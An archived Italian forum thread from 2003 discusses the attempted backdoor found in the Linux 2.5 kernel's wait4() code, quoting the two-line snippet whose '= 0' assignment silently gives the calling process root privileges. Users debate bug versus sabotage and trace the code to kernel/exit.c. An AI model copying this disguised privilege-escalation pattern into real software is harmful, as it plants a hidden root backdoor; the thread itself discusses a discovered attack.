PDA

View Full Version : Kernel Linux 2.5: bug o backdoor?

Ziosilvio
16-11-2003, 16:19
Ciao a tutti.
E' un po' vecchiotta, ma preoccupante.

Pare che, in Linux 2.5, abbiano trovato il seguente codice nella chiamata wait4():

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

Avete letto bene?
Questo codice, se sono sollevati i flag __WCLONE e __WALL, cambia l'UID del processo corrente in modo da farlo operare con i privilegi di root .
Per fortuna se ne sono accorti in tempo...

Sarà una svista? :rolleyes:
O sarà un tentativo di sabotaggio? :cry:

Ho trovato la notizia qui (http://www.zeusnews.com/index.php3?ar=stampa&cod=2562&numero=999) .

A risentirvi.
NA01
16-11-2003, 16:29
l'importante è che sia stato trovato!
a dimostrazione che spesso l'open source funziona :)
Cimi
16-11-2003, 20:26
e che se il tipo che lo scopre nn lo dice a nessuno può far danni quanto gli pare! :D

:sofico:
ilsensine
17-11-2003, 07:43
http://forum.hwupgrade.it/showthread.php?s=&threadid=559885
Ziosilvio
17-11-2003, 10:30
Originariamente inviato da ilsensine
http://forum.hwupgrade.it/showthread.php?s=&threadid=559885

Grazie, avevo letto anche quello.
Ma parla di una modifica alla exit(), mentre quella che avevo segnalato io e' relativa alla wait4().
Piuttosto, e' importante (ri)segnalare che il thread di sviluppo non era quello principale.

A proposito: il link alla segnalazione sulla exit() e' cambiato (l'articolo e' stato inserito nell'archivio), ora la pagina e' qui (http://kt.zork.net/kernel-traffic/kt20031109_240.html#15).
ilsensine
17-11-2003, 10:32
Originariamente inviato da Ziosilvio
Ma parla di una modifica alla exit(), mentre quella che avevo segnalato io e' relativa alla wait4().

Umm la pagina è cambiata da quando Gurutech l'ha postata; parlava esattamente della wait4.
ilsensine
17-11-2003, 10:33
Originariamente inviato da Ziosilvio
A proposito: il link alla segnalazione sulla exit() e' cambiato (l'articolo e' stato inserito nell'archivio), ora la pagina e' qui (http://kt.zork.net/kernel-traffic/kt20031109_240.html#15).
La sys_wait4 è implementata nel file kernel/exit.c
Ziosilvio
17-11-2003, 11:20
Originariamente inviato da ilsensine
La sys_wait4 è implementata nel file kernel/exit.c

Il che spiega tutto.
Ho letto meglio: era il file exit.c, non la funzione exit().
Per cui mi sa che la vulnerabilita' era proprio quella dell'altro thread.
Grazie mille.